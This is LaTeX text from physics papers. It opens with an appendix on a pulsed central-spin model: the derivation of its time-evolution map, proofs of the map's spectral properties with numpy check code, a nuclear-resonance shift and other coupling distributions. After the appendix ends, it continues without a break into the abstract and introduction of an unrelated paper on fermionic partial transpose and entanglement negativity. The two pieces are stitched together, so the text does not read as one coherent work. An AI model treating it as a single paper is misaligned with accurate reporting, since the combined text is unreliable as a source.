\ket{\downarrow} \bra{\uparrow} = S^-.
\end{equation}
The final step consists in inserting \eqref{eq:spin2} into \eqref{eq:matrix1}
and integrating the exponential time dependence straightforwardly from 0 to ${T_\mathrm{rep}}$.
Since we assume that $2\gamma{T_\mathrm{rep}}\gg1$ so that no trions are present once the next
pulse arrives the upper integration limit ${T_\mathrm{rep}}$ can safely and consistently be
replaced by $\infty$. This makes the expressions
\begin{equation}
G_{\alpha\beta}(\tau) := \frac{\gamma}{2\gamma-i[E_\alpha-E_\beta+zh(m_\beta-m_\alpha+\tau)]}
\end{equation}
appear where $\tau\in\{-1,0,1\}$. Finally,
we use \eqref{eq:initial-S} and summarize
\begin{equation}
\rho_{\alpha\beta}(t) = e^{-i(E_\alpha-E_\beta)t}
\Big\{
(S^-S^+ \rho_\text{S}(0-) S^-S^+ )_{\alpha\beta}
+\sum_{\tau=-1}^1 G_{\alpha\beta}(\tau) R^{(\tau)}_{\alpha\beta}
\Big\}.
\label{eq:complete}
\end{equation}
This provides the complete solution for the dynamics of the $d\times d$ matrix
$\rho_\text{S}$
from just before a pulse ($t=0-$) until just before the next pulse, for
which we set $t={T_\mathrm{rep}}$ in \eqref{eq:complete}.
In order to set up the linear mapping $M$ as a $D\times D$ matrix
with $D=d^2$, we denote the matrix elements by $M_{\mu'\mu}$, where $\mu$
is a combined index for the index pair $\alpha\beta$ and $\mu'$
for $\alpha'\beta'$, with
$\alpha,\beta,\alpha',\beta'\in\{1,2,\ldots,d\}$.
For brevity, we introduce
\begin{equation}
P_{\alpha\beta} := [(S^++\mathbb{1}_d)S^-]_{\alpha\beta} \qquad
Q_{\alpha\beta} := [(S^+-\mathbb{1}_d)S^-]_{\alpha\beta}.
\end{equation}
Then, \eqref{eq:complete} implies
\begin{align}
M_{\mu'\mu} &= \frac{1}{2}e^{-i(E_{\alpha'}-E_{\beta'}){T_\mathrm{rep}}}\Big\{
2(S^-S^+)_{\alpha'\alpha} (S^-S^+)_{\beta\beta'}
\nonumber \\
&+2G_{\alpha'\beta'}(0)
\left[(S^+S^-)_{\alpha'\alpha} (S^+S^-)_{\beta\beta'}
+ S^-_{\alpha'\alpha} S^+_{\beta\beta'}\right]
\nonumber \\
&+\left[
G_{\alpha'\beta'}(1) P_{\alpha'\alpha} Q^*_{\beta'\beta}
+ G_{\alpha'\beta'}(-1) Q_{\alpha'\alpha} P^*_{\beta'\beta}
\right]\Big\}.
\label{eq:matrix2}
\end{align}
This concludes the explicit derivation of the matrix elements
of $M$. Note that they are relatively simple in the sense that no
sums over matrix indices are required on the right hand side of
\eqref{eq:matrix2}. This relative simplicity is achieved because
we chose to work in the eigenbasis of $H_\text{spin}$.
Other choices of basis are possible, but render the explicit
representation significantly more complicated.
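The combined-index bookkeeping behind \eqref{eq:matrix2} can be made concrete with a short numerical sketch. The following toy example (plain numpy, not the specific $M$ of \eqref{eq:matrix2}; all names are illustrative) encodes a single ``sandwich'' term $\rho\mapsto A\rho B$, the building block of each contribution above, as a $D\times D$ matrix with row index $\mu'=(\alpha',\beta')$ and column index $\mu=(\alpha,\beta)$:

```python
import numpy as np

d = 3
D = d * d
rng = np.random.default_rng(0)

# A single "sandwich" term rho -> A rho B, the building block of each
# contribution above: (A rho B)_{a'b'} = A_{a'a} rho_{ab} B_{bb'}.
A = rng.standard_normal((d, d)) + 1j * rng.standard_normal((d, d))
B = rng.standard_normal((d, d)) + 1j * rng.standard_normal((d, d))

# D x D superoperator with combined row index mu' = (a', b') and column
# index mu = (a, b); note that no internal index sums are needed.
M = np.zeros((D, D), dtype=complex)
for ap in range(d):
    for bp in range(d):
        for a in range(d):
            for b in range(d):
                M[ap * d + bp, a * d + b] = A[ap, a] * B[b, bp]

rho = rng.standard_normal((d, d)) + 1j * rng.standard_normal((d, d))
vec = rho.reshape(D)            # row-major flattening, mu = a*d + b
assert np.allclose((M @ vec).reshape(d, d), A @ rho @ B)
```

The absence of index sums in each matrix element mirrors the structure of \eqref{eq:matrix2}.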
\section{Properties of the Time Evolution}
\label{app:properties}
\paragraph{Preliminaries}
Here we state several mathematical properties of the mapping $M$ which
hold for any Lindblad dynamics over a given time interval which can
be iterated arbitrarily many times. We assume
that the underlying Hilbert space is $d$ dimensional so that $M$ acts
on the $D=d^2$ dimensional Hilbert space of
$d\times d$ matrices, i.e., $M$ can be seen as $D\times D$ matrix.
We denote the standard scalar product in the space of operators by
\begin{equation}
(A|B):=\text{Tr}(A^\dag B)
\end{equation}
where the trace refers to the $d\times d$ matrices $A$ and $B$.
Since no state of the physical system vanishes in its temporal evolution,
$M$ conserves the trace of any density matrix
\begin{equation}
\text{Tr}(M\rho)=\text{Tr}(\rho).
\end{equation}
This implies that $M$ conserves the trace of \emph{any} operator $C$. This can be
seen by writing $C=(C+C^\dag)/2+ (C-C^\dag)/2=R+iG$ where $R$ and $G$ are
hermitian operators. They can be diagonalized and split into their positive and their
negative part $R=p_1-p_2$ and $G=p_3-p_4$. Hence, each $p_i$ is a density matrix
up to some real, positive scaling and we have
\begin{equation}
\label{eq:C-darst}
C = p_1-p_2+i(p_3-p_4).
\end{equation}
Then we conclude
\begin{subequations}
\begin{align}
\text{Tr}(MC) &= \text{Tr}(Mp_1)-\text{Tr}(Mp_2)+ i(\text{Tr}(Mp_3)-\text{Tr}(Mp_4))
\\
& = \text{Tr}(p_1)-\text{Tr}(p_2)+i(\text{Tr}(p_3)-\text{Tr}(p_4))
\ =\ \text{Tr}(C).
\end{align}
\end{subequations}
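The decomposition \eqref{eq:C-darst} is straightforward to realize numerically. The sketch below (plain numpy, illustrative only) splits an arbitrary matrix into the four positive parts and also verifies the orthogonality $(p_1|p_2)=0$ of the two parts of one diagonalization, which is used again in the proof of property 4:

```python
import numpy as np

rng = np.random.default_rng(1)
d = 4
C = rng.standard_normal((d, d)) + 1j * rng.standard_normal((d, d))

# Hermitian split C = R + iG.
R = (C + C.conj().T) / 2
G = (C - C.conj().T) / 2j

def pos_neg_parts(H):
    """Positive and negative parts of a hermitian H, so that H = Hp - Hm."""
    w, V = np.linalg.eigh(H)
    Hp = (V * np.clip(w, 0, None)) @ V.conj().T
    Hm = (V * np.clip(-w, 0, None)) @ V.conj().T
    return Hp, Hm

p1, p2 = pos_neg_parts(R)
p3, p4 = pos_neg_parts(G)

assert np.allclose(C, p1 - p2 + 1j * (p3 - p4))
# Each p_i is a density matrix up to a positive rescaling ...
assert np.all(np.linalg.eigvalsh(p1) >= -1e-12)
# ... and the two parts of one diagonalization are orthogonal, (p1|p2) = 0.
assert abs(np.trace(p1.conj().T @ p2)) < 1e-10
```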
\paragraph{Property 1.}
The conservation of the trace for any $C$ implies
\begin{equation}
\label{eq:gen_trace_conserv}
\text{Tr}(C)=(\mathbb{1}_d|C)=(\mathbb{1}_d|MC)=(M^\dag\mathbb{1}_d|C)
\end{equation}
where $\mathbb{1}_d$ is the $d\times d$-dimensional identity matrix and $M^\dag$ is the
$D\times D$ hermitian conjugate of $M$. From \eqref{eq:gen_trace_conserv} we conclude
\begin{equation}
M^\dag \mathbb{1}_d = \mathbb{1}_d
\end{equation}
which means that $\mathbb{1}_d$ is an eigenoperator of $M^\dag$ with eigenvalue 1. Since the
characteristic polynomial of $M$ is the same as the one of $M^\dag$ up to complex conjugation
we immediately see that $1$ is also an eigenvalue of $M$.
If the dynamics of the system takes place in $n$ independent subspaces without
transitions between them, the $n$ different
traces over these subspaces are conserved separately.
Such a separation occurs in case conserved symmetries
split the Hilbert space; for instance,
the total spin is conserved in the dynamics given by Eq.~(6)
if all couplings are equal.
Then, the above argument implies the existence of $n$ different eigenoperators with
eigenvalue 1. Hence the degeneracy is (at least) $n$, which proves property
1. in the main text.
\paragraph{Properties 2. and 3.} As for property 2, we consider an eigenoperator $C$ of
$M$ with eigenvalue $\lambda\neq1$ so that $MC=\lambda C$. Then
\begin{equation}
\text{Tr}(C) = \text{Tr}(MC) \ = \ \lambda \text{Tr}(C)
\end{equation}
implies $\text{Tr}(C)=0$, i.e., tracelessness as stated.
Since all density matrices can be written as linear combinations of eigenoperators,
there must be at least one eigenoperator with finite trace.
In view of property 2., this needs to be an
eigenoperator with eigenvalue 1, proving property 3.
The latter conclusion holds true even if $M$ cannot be
diagonalized but only has a Jordan normal form. If $d_\text{J}$ is the
dimension of the largest Jordan block, the density matrix $M^{d_\text{J}-1}\rho$
will be a linear combination of eigenoperators while still having the trace 1.
\paragraph{Property 4.} Next, we show that no eigenvalue $\lambda$ can be larger than 1 in absolute value.
The idea of the derivation is that the iterated application
of $M$ to the eigenoperator belonging to $|\lambda|>1$ would make
this term grow exponentially $\propto |\lambda|^n$
beyond any bound which cannot be true. The formal proof is a bit intricate.
First, we state that for any two density matrices $\rho$ and $\rho'$
their scalar product is non-negative $0\le (\rho|\rho')$ because it
can be viewed as the expectation value of one of them with respect to the other
and both are positive operators. In addition, the Cauchy-Schwarz inequality
implies
\begin{equation}
\label{eq:rhorho}
0 \le (\rho|\rho') \le \sqrt{(\rho|\rho)(\rho'|\rho')}
\ =\ \sqrt{\text{Tr}(\rho^2)\text{Tr}((\rho')^2)} \ \le\ 1.
\end{equation}
Let $C$ be the eigenoperator of $M^\dag$ belonging to $\lambda$; it may be represented
as in \eqref{eq:C-darst} and scaled such that the maximum of the traces of the $p_i$ is
1. Without loss of generality this is the case for $p_1$, i.e., $\text{Tr}(p_1)=1$. Otherwise,
$C$ is simply rescaled: by $C\to-C$ to switch $p_2$ to $p_1$, by $C\to-iC$
to switch $p_3$ to $p_1$, or by $C\to iC$ to switch $p_4$ to $p_1$.
On the one hand, we have for any density matrix $\rho_n$
\begin{equation}
|(C|\rho_n)| \le |\Re(C|\rho_n)| + |\Im(C|\rho_n)| \le 2
\end{equation}
where the last inequality results from \eqref{eq:rhorho}.
On the other hand, we set $\rho_n:= M^np_1$ and obtain
\begin{subequations}
\begin{align}
2 &\ge |(C|\rho_n)|
= |((M^\dag)^nC|p_1)|
= |\lambda^*|^n |(C|p_1)|
=|\lambda|^n \sqrt{(\Re(C|p_1))^2+ (\Im(C|p_1))^2}
\\
&\ge |\lambda|^n|\Re(C|p_1)|
= |\lambda|^n(p_1|p_1)
\end{align}
\end{subequations}
where we used $(p_1|p_2)=0$ in the last step; this holds because
$p_1$ and $p_2$ result from the same diagonalization, but refer
to eigenspaces with eigenvalues of different sign.
In essence we derived
\begin{equation}
2 \ge |\lambda|^n(p_1|p_1)
\end{equation}
which clearly implies a contradiction for $n \to \infty$ because
the right hand side increases to infinity for $|\lambda|>1$.
Hence there cannot be eigenvalues with modulus larger than 1.
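This bound can also be checked numerically for any trace-preserving positive map. The sketch below (a randomly generated Kraus map as a generic stand-in for the evolution over one repetition period of a Lindblad dynamics; all names are illustrative) confirms that the superoperator spectrum lies inside the closed unit disk, with the eigenvalue 1 of property 1 attained:

```python
import numpy as np

rng = np.random.default_rng(2)
d = 3

# Random CPTP (Kraus) map rho -> sum_k K_k rho K_k^dag with
# sum_k K_k^dag K_k = 1.
K = rng.standard_normal((4, d, d)) + 1j * rng.standard_normal((4, d, d))
S = sum(Kk.conj().T @ Kk for Kk in K)
W = np.linalg.inv(np.linalg.cholesky(S).conj().T)  # enforce normalization
K = np.array([Kk @ W for Kk in K])

# Superoperator as a D x D matrix: vec(K rho K^dag) = (K kron K^*) vec(rho)
# in the row-major vec convention.
M = sum(np.kron(Kk, Kk.conj()) for Kk in K)
eig = np.linalg.eigvals(M)

assert np.allclose(sum(Kk.conj().T @ Kk for Kk in K), np.eye(d))
assert np.isclose(np.max(np.abs(eig)), 1.0)   # eigenvalue 1 is attained
assert np.all(np.abs(eig) <= 1.0 + 1e-10)     # no modulus exceeds 1
```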
\paragraph{Property 5.} The matrix $M$ can be represented
with respect to a basis of the Krylov space spanned by the
operators
\begin{equation}
\label{eq:krylov}
\rho_n:=M^n\rho_0
\end{equation}
where $\rho_0$ is an arbitrary initial density matrix which should
contain contributions from all eigenspaces of $M$. For instance,
a Gram-Schmidt algorithm applied to the Krylov basis generates
an orthonormal basis $\tilde \rho_n$. Since all the
operators $\rho_n$ from \eqref{eq:krylov} are hermitian density matrices,
all overlaps $(\rho_m|\rho_n)$ are real and hence the constructed
orthonormal basis $\tilde \rho_n$ consists of hermitian operators,
$\tilde \rho_n = \tilde \rho_n^\dag$.
Also, all matrix elements
$(\rho_m|M\rho_n)=(\rho_m|\rho_{n+1})$ are real so that the resulting
representation $\tilde M$ is a matrix with real coefficients whence
\begin{subequations}
\begin{equation}
\tilde M c = \lambda c
\end{equation}
implies
\begin{equation}
\tilde M c^* = \lambda^* c^*
\end{equation}
\end{subequations}
by complex conjugation. Here $c$ is a vector of complex numbers $c_n$ which
define the corresponding eigenoperators by
\begin{equation}
\label{eq:cC}
C = \sum_{n=1}^D c_n \tilde \rho_n.
\end{equation}
Thus, $c$ and $c^*$ define $C$ and $C^\dag$, respectively.
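The reality of the representation is not tied to the Krylov construction: any Hermiticity-preserving map has real matrix elements with respect to an orthonormal basis of hermitian operators, since $(B_m|MB_n)=\text{Tr}(B_m\,M(B_n))$ is the trace of a product of two hermitian operators. A minimal numerical check with the Pauli basis (a toy channel, not the $M$ of the main text; illustrative only):

```python
import numpy as np

rng = np.random.default_rng(3)

# Orthonormal basis of hermitian 2x2 operators w.r.t. (A|B) = Tr(A^dag B).
sx = np.array([[0, 1], [1, 0]], dtype=complex)
sy = np.array([[0, -1j], [1j, 0]])
sz = np.array([[1, 0], [0, -1]], dtype=complex)
basis = [m / np.sqrt(2) for m in (np.eye(2, dtype=complex), sx, sy, sz)]

# A toy Hermiticity-preserving map X -> A X A^dag.
A = rng.standard_normal((2, 2)) + 1j * rng.standard_normal((2, 2))
channel = lambda X: A @ X @ A.conj().T

# Matrix elements (B_m|M B_n) are traces of products of hermitian
# operators and therefore real.
Mtilde = np.array([[np.trace(Bm.conj().T @ channel(Bn)) for Bn in basis]
                   for Bm in basis])
assert np.allclose(Mtilde.imag, 0.0)

# Eigenvalues of the real matrix come in conjugate pairs, matching the
# pairing of eigenoperators C and C^dag.
w = np.linalg.eigvals(Mtilde.real)
assert np.allclose(np.sort_complex(w), np.sort_complex(w.conj()))
```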
\paragraph{Property 6.} In view of the real representation $\tilde M$ of $M$
with respect to an orthonormal basis of hermitian operators derived in the
previous paragraph the determination of the eigenoperators with eigenvalue
1 requires the computation of the kernel of $\tilde M-\mathbb{1}_D$. This is a linear algebra
problem in $\mathbb{R}^D$ with real solutions which correspond to
hermitian operators by means of \eqref{eq:cC}. This shows the stated
property 6.
\begin{figure}[hbt]
\centering
\includegraphics[width=0.49\columnwidth]{fig6a}
\includegraphics[width=0.49\columnwidth]{fig6b}
\includegraphics[width=0.49\columnwidth]{fig6c}
\caption{(a) Residual entropy as a function of the applied
magnetic field for $N=3$, $J_\text{max}=0.02$, and $z=1/1000$, showing the position
of the nuclear magnetic resonance at $h=2\pi/(z{T_\mathrm{rep}})$ and its shift
(dashed line at $\approx 500J_\text{Q}J_\text{max}/(2z)$).
(b) Same as (a) for $z=1/500$. (c) Same as (a) for $z=1/250$.}
\label{fig:z-depend}
\end{figure}
\section{Shift of the Nuclear Resonance}
\label{app:shift}
\begin{figure}[hbt]
\centering
\includegraphics[width=0.5\columnwidth]{fig7}
\caption{Residual entropy as a function of the applied
magnetic field for $N=3$, $z=1/1000$, and various values of $J_\text{max}$.
The shifts indicated by the dashed lines
correspond to the estimate \eqref{eq:nuclear-shift2}.
\label{fig:jm-depend}}
\end{figure}
In the main text, the shift of the nuclear resonance due to the
coupling of the nuclear spins to the central, electronic spin
was shown in the right panel of Fig.\
1(a). The effect can be estimated by
\begin{equation}
\label{eq:nuclear-shift2}
z\Delta h \approx \pm J_\text{max}/2.
\end{equation}
This relation is highly plausible, but it cannot be derived analytically
because no indication for a polarization of the central, electronic
spin in the $x$-direction was found. Yet, the numerical data
corroborates the validity of \eqref{eq:nuclear-shift2}.
In Fig.\ \ref{fig:z-depend}, we show that the nuclear resonance
without shift occurs for
\begin{equation}
zh{T_\mathrm{rep}}=2\pi n'
\end{equation}
where $n'\in\mathbb{Z}$. But it is obvious that
an additional shift occurs which is indeed captured by
\eqref{eq:nuclear-shift2}.
In order to support \eqref{eq:nuclear-shift2} further, we also
study various values of $J_\text{max}$ in Fig.\ \ref{fig:jm-depend}.
The estimate \eqref{eq:nuclear-shift2} captures the main trend
of the data, but it is not completely quantitative because the
position of the dashed lines relative to the minimum of the
envelope of the resonances varies slightly for different values of $J_\text{max}$.
Hence, a more quantitative explanation is still called for.
\section{Entropy Reduction for Other Distributions of Couplings}
\label{app:other}
In the main text, we analyzed a uniform distribution of couplings, see
Eq.\ (8).
In order to underline that our results are generic and not linked to
a special distribution, we provide additional results for
two distributions which are often considered in literature, namely an
exponential parameterization as defined in \eqref{eq:expo}
and a Gaussian parametrization as defined in \eqref{eq:gaus}.
\begin{figure}[htb]
\centering
\includegraphics[width=0.49\columnwidth]{fig8a}
\includegraphics[width=0.48\columnwidth]{fig8b}
\caption{Residual entropy as a function of the applied
magnetic field for various bath sizes $N$ for
the exponentially distributed couplings given by \eqref{eq:expo}; panel (a) for
$\alpha=1$ and panel (b) for $\alpha=0.5$, and hence a smaller ratio
$J_\text{min}/J_\text{max}$.
\label{fig:expo}}
\end{figure}
The key difference between both parametrizations \eqref{eq:expo}
and \eqref{eq:gaus} is that due to the quadratic argument in \eqref{eq:gaus}
the large couplings in this parametrization are very close to each other,
in particular for increasing $N$. Hence, one can study whether this feature
is favorable or unfavorable for entropy reduction.
\begin{figure}[htb]
\centering
\includegraphics[width=0.49\columnwidth]{fig9a}
\includegraphics[width=0.48\columnwidth]{fig9b}
\caption{Residual entropy as a function of the applied
magnetic field for various bath sizes $N$ for
the Gaussian distributed couplings given by \eqref{eq:gaus}; panel (a) for
$\alpha=1$ and panel (b) for $\alpha=0.5$, and hence a smaller ratio
$J_\text{min}/J_\text{max}$.
\label{fig:gaus}}
\end{figure}
Additionally, the difference between $\alpha=0.5$ and $\alpha=1$ consists
in a different spread of the couplings. For $\alpha=1$, one has
$J_\text{min}/J_\text{max}=1/e$ in both parametrizations while one has
$J_\text{min}/J_\text{max}=1/\sqrt{e}$ for $\alpha=0.5$, i.e., the spread is
smaller.
Figure \ref{fig:expo} displays the results for the exponential parametrization
\eqref{eq:expo} while Fig.\ \ref{fig:gaus} depicts the results for the Gaussian
parametrization \eqref{eq:gaus}. Comparing both figures shows that the
precise distribution of the couplings does not matter much. Exponential and
Gaussian parametrization lead to very similar results. They also strongly ressemble
the results shown in Fig.\ 2a in the main text for a uniform
distribution of couplings. This is quite remarkable since the Gaussian
parametrization leads to couplings which are very close to each other
and to the maximum coupling. This effect does not appear to influence
the achievable entropy reduction.
The ratio $J_\text{min}/J_\text{max}$ of the smallest to the largest coupling
appears to have an impact. If it is closer to unity, here for
$\alpha=0.5$, the reduction of entropy works even better than
for smaller ratios.
\end{appendix}
\section*{Abstract}
A basic diagnostic of entanglement in mixed quantum states is known as the positive partial transpose (PT) criterion.
Such a criterion is based on the observation that the spectrum of the partially transposed density matrix of an entangled state contains negative eigenvalues, which are, in turn, used to define an entanglement measure called the logarithmic negativity.
Despite the great success of the logarithmic negativity in characterizing bosonic many-body systems,
generalizing the operation of PT to fermionic systems remained a technical challenge until recently, when a more natural definition of PT for fermions that accounts for the Fermi statistics was put forward.
In this paper, we study the many-body spectrum of the reduced density matrix of two adjacent intervals for one-dimensional free fermions after applying the fermionic PT.
We show that in general there is a freedom in the definition of such an operation, which leads to two different definitions of PT: the resulting density matrix is Hermitian in one case, while it becomes pseudo-Hermitian in the other case.
Using the path-integral formalism, we analytically compute the leading order term of the moments in both cases and derive the distribution of the corresponding eigenvalues over the complex plane.
We further verify our analytical findings by checking them against numerical lattice calculations.
}
\newpage
\vspace{10pt}
\noindent\rule{\textwidth}{1pt}
\tableofcontents\thispagestyle{fancy}
\noindent\rule{\textwidth}{1pt}
\vspace{10pt}
\newpage
\section{Introduction}
Entanglement is an intrinsic property of quantum systems beyond classical physics.
Having efficient frameworks to compute entanglement between two parts of a system is essential not only for fundamental interests such as characterizing phases of matter~\cite{Amico_rev2008,ccd-09,l-15,WenChen_book} and spacetime physics~\cite{Rangamani_book} but also for application purposes such as identifying useful resources to implement quantum computing processes.
For a bipartite Hilbert space $\mathcal{H}_A\otimes\mathcal{H}_B$, it is easy to determine whether a pure state $\ket{\Psi}$ is entangled or not: a product state, i.e.~any state of the form $\ket{\Phi_A}\otimes \ket{\Phi_B}$, is unentangled (separable), while a superposition state $\ket{\Psi}=\sum_i \alpha_i \ket{\Phi_A^{(i)}}\otimes \ket{\Phi_B^{(i)}}$, where $\ket{\Phi_{A/B}^{(i)}}$ is a set of local orthogonal states, is entangled.
The amount of entanglement in a given state can be quantified by the entropy of information within either subsystem $A$ or $B$, in the form of the von Neumann entropy
\begin{align}\label{eq:vN_def}
S(\rho_A)= -\text{Tr} (\rho_A \ln \rho_A)= -\sum_i \alpha_i^2 \ln \alpha_i^2,
\end{align}
or
the R\'enyi entanglement entropies (REEs)
\begin{align}\label{eq:Rn_def}
{\cal R}_n(\rho_A)= \frac{1}{1-n} \ln \text{Tr} (\rho_A^n)= \frac{1}{1-n} \ln \sum_i \alpha_i^{2n},
\end{align}
where $\rho_A=\text{Tr}_B(\ket{\Psi}\bra{\Psi})=\sum_i \alpha_i^2 \ket{\Phi_A^{(i)}} \bra{\Phi_A^{(i)}}$ is the reduced density matrix acting on $\mathcal{H}_A$. Notice that $S(\rho_A)=S(\rho_B)$ and ${\cal R}_n(\rho_A)={\cal R}_n(\rho_B)$ and clearly, $S,{\cal R}_n\geq 0$ where the equality holds for a product state. For analytical calculations, $S$ is usually obtained from ${\cal R}_n$ via $S=\lim_{n\to 1}{\cal R}_n$.
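For a pure state, the quantities \eqref{eq:vN_def} and \eqref{eq:Rn_def} follow directly from the singular values of the coefficient matrix of $\ket{\Psi}$, i.e., from its Schmidt decomposition. A short numerical sketch (plain numpy, illustrative only):

```python
import numpy as np

rng = np.random.default_rng(4)
dA, dB = 4, 5

# Random pure state |Psi> on H_A x H_B as a dA x dB coefficient matrix.
psi = rng.standard_normal((dA, dB)) + 1j * rng.standard_normal((dA, dB))
psi /= np.linalg.norm(psi)

# The Schmidt coefficients alpha_i are the singular values of psi.
alpha = np.linalg.svd(psi, compute_uv=False)
p = alpha ** 2                 # eigenvalues of rho_A (and of rho_B)
assert np.isclose(p.sum(), 1.0)

S = -np.sum(p * np.log(p))                           # von Neumann entropy
renyi = lambda n: np.log(np.sum(p ** n)) / (1 - n)   # Renyi entropy R_n

assert np.isclose(renyi(1 + 1e-6), S, atol=1e-4)     # R_n -> S as n -> 1
assert S > 0                              # a generic pure state is entangled
```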
It is well-known that the eigenvalues of density matrices, i.e.~the entanglement spectrum, contain more information than merely the entanglement entropies.
The entanglement spectrum has been studied and utilized toward a better understanding of phases of matter
\cite{2006PhRvB..73x5115R, Li_Haldane,PhysRevLett.103.016801,PhysRevLett.104.130502,PhysRevLett.104.156404,PhysRevLett.104.180502,PhysRevLett.105.080501,PhysRevB.81.064439,PhysRevX.1.021014,PhysRevLett.107.157001,PhysRevB.83.115322,PhysRevB.83.245132,PhysRevLett.110.236801,PhysRevLett.108.196402,PhysRevB.86.014404,PhysRevLett.110.067208,PhysRevLett.111.090401,Bauer2014},
broken-symmetry phases
\cite{Metlitski2011,PhysRevLett.110.260403,Tubman2014,PhysRevB.88.144426,PhysRevLett.116.190401},
and more exotic phases such as many-body localized states~\cite{PhysRevLett.115.267206,PhysRevB.93.174202,PhysRevLett.117.160601}. In particular, in the context of conformal field theories (CFTs) in (1+1)d the distribution of eigenvalues was analytically derived~\cite{Lefevre2008}
and was shown to obey a universal scaling function which depends only on the central charge of the underlying CFT. The obtained scaling function for the distribution of the entanglement spectrum at criticality
was further substantiated numerically~\cite{Lauchli2013,pm-10}, especially for matrix product
state representation at critical points~\cite{PhysRevLett.102.255701,PhysRevB.78.024410,PhysRevB.86.075117}.
It turned out that extending the above ideas to mixed states where the system is described by a density matrix $\rho$
is not as easy as it may seem. A product state $\rho=\rho_A\otimes \rho_B$ is similarly unentangled. However, a large class of states, called separable states, in the form of $\rho=\sum_i p_i \rho_A^{(i)} \otimes \rho_B^{(i)}$ with $p_i\geq 0$ are classically correlated and do not contain any amount of entanglement.
Hence, the fact that superposition implies entanglement in pure states does not simply generalize to the entanglement in mixed states.
The positive partial transpose (PPT)~\cite{Peres1996,Horodecki1996,Simon2000,PhysRevLett.86.3658,PhysRevLett.87.167904,Zyczkowski1,Zyczkowski2} is a test designed to diagnose separable states based on the fact that density matrices are positive semi-definite operators. The PT of a density matrix $\rho=\sum_{ijkl} \rho_{ijkl} \ket{e_A^{(i)}, e_B^{(j)}} \bra{e_A^{(k)}, e_B^{(l)}}$ written in a local orthonormal basis $\{\ket{e_A^{(k)}}, \ket{e_B^{(j)}} \}$ is defined by exchanging the indices of subsystem $A$ (or $B$) as in
\begin{align} \label{eq:rTb}
\rho^{T_A}=\sum_{ijkl} \rho_{ijkl} \ket{e_A^{(k)}, e_B^{(j)}} \bra{e_A^{(i)}, e_B^{(l)}}.
\end{align}
Note that $\rho^{T_A}$ is a Hermitian operator and the PPT test follows by checking whether or not $\rho^{T_A}$ contains any negative eigenvalue.
A separable state passes the PPT test, i.e.~all the eigenvalues of $\rho^{T_A}$ are non-negative, whereas an inseparable (i.e., entangled) state yields negative eigenvalues after PT\footnote{A technical point is that there exists a set of inseparable states which also pass the PPT test~\cite{Horodecki1997}. They are said to contain bound entanglement which cannot be used for quantum computing processes such as teleportation~\cite{Horodecki1998}. This issue is beyond the scope of our paper and we do not elaborate further here.}. Hence, the PPT criterion can be used to decide whether a given density matrix is separable or not.
Similar to the entropic measures of pure-state entanglement in (\ref{eq:vN_def}) and (\ref{eq:Rn_def}),
the (logarithmic) entanglement negativity associated with the spectrum of the partially transposed density matrix is defined as a candidate to quantify mixed-state entanglement~\cite{PlenioEisert1999,Vidal2002,Plenio2005},
\begin{align} \label{eq:neg}
{\cal N}(\rho) &= \frac{\norm{{\rho^{T_A}} }-1}{2}, \\
\label{eq:neg_def}
{\cal E}(\rho) &= \ln \norm{{\rho^{T_A}} },
\end{align}
where $\norm{A}= \text{Tr} \sqrt{A A^\dag}$ is the trace norm. When $A$ is Hermitian, the trace norm simplifies to the sum of the absolute values of the eigenvalues of $A$. Hence, the above quantities measure the \emph{negativity} of the eigenvalues of $\rho^{T_A}$.
It is also useful to define the moments of the PT (aka R\'enyi negativity) via
\begin{align} \label{eq:pathTR_b}
{\cal N}_n(\rho) =\ln \text{Tr} ({\rho^{T_A}} )^n,
\end{align}
where the logarithmic negativity is obtained from analytic continuation
\begin{align} \label{eq:anal_cont_b}
{\cal E}(\rho)= \lim_{n\to 1/2} {\cal N}_{2n}(\rho).
\end{align}
Note that for a pure state $\rho=\ket{\Psi}\bra{\Psi}$, we have ${\cal E}(\rho)={\cal R}_{1/2}(\rho_A)$ where $\rho_A$ is the reduced density matrix on $\mathcal{H}_A$.
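For small systems the definitions \eqref{eq:neg} and \eqref{eq:neg_def} can be evaluated directly. The sketch below (the standard bosonic PT on two qubits, illustrative only) reproduces the textbook values ${\cal E}=\ln 2$ and ${\cal N}=1/2$ for a Bell pair and shows that a separable mixture passes the PPT test:

```python
import numpy as np

# Bell pair (|00> + |11>)/sqrt(2) on two qubits.
bell = np.zeros(4)
bell[0] = bell[3] = 1 / np.sqrt(2)
rho = np.outer(bell, bell)

def partial_transpose_A(rho, dA=2, dB=2):
    r = rho.reshape(dA, dB, dA, dB)           # indices (i, j, k, l)
    return r.transpose(2, 1, 0, 3).reshape(dA * dB, dA * dB)  # swap i <-> k

w = np.linalg.eigvalsh(partial_transpose_A(rho))
trace_norm = np.abs(w).sum()

assert np.isclose(np.log(trace_norm), np.log(2))   # E = ln 2
assert np.isclose((trace_norm - 1) / 2, 0.5)       # N = 1/2
assert w.min() < 0                                 # fails the PPT test

# A separable mixture of |00> and |11> passes the PPT test.
sep = np.diag([0.5, 0.0, 0.0, 0.5])
assert np.linalg.eigvalsh(partial_transpose_A(sep)).min() >= -1e-12
```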
The entanglement negativity has been used to characterize mixed states in various quantum systems such as in
harmonic oscillator chains~\cite{PhysRevA.66.042327,PhysRevLett.100.080502,PhysRevA.78.012335,Anders2008,PhysRevA.77.062102,PhysRevA.80.012325,Eisler_Neq,Sherman2016,dct-16}, quantum spin models
\cite{PhysRevA.80.010304,PhysRevLett.105.187204,PhysRevB.81.064429,PhysRevLett.109.066403,Ruggiero_1,PhysRevA.81.032311,PhysRevA.84.062307,Mbeng,Grover2018,java-2018}, (1+1)d conformal and integrable field theories~\cite{Calabrese2012,Calabrese2013,Calabrese_Ft2015,Ruggiero_2,Alba_spectrum,kpp-14,fournier-2015,bc-16}, topologically ordered phases of matter in (2+1)d~\cite{Wen2016_1,Wen2016_2,PhysRevA.88.042319,PhysRevA.88.042318,hc-18},
and in out-of-equilibrium situations \cite{ctc-14,ez-14,hb-15,ac-18b,wen-2015,gh-18},
as well as holographic theories~\cite{Rangamani2014,Chaturvedi_1,Chaturvedi_2,Chaturvedi2018,Malvimat,Kudlerflam} and variational states~\cite{Clabrese_network2013,Alba2013,PhysRevB.90.064401,Nobili2015}.
Moreover, the PT was used to construct topological invariants for symmetry protected topological (SPT) phases protected by anti-unitary symmetries~\cite{Pollmann_Turner2012,Shiozaki_Ryu2017,Shap_unoriented,Shiozaki_antiunitary} and there are experimental proposals to measure it
with cold atoms \cite{gbbs-17,csg-18}.
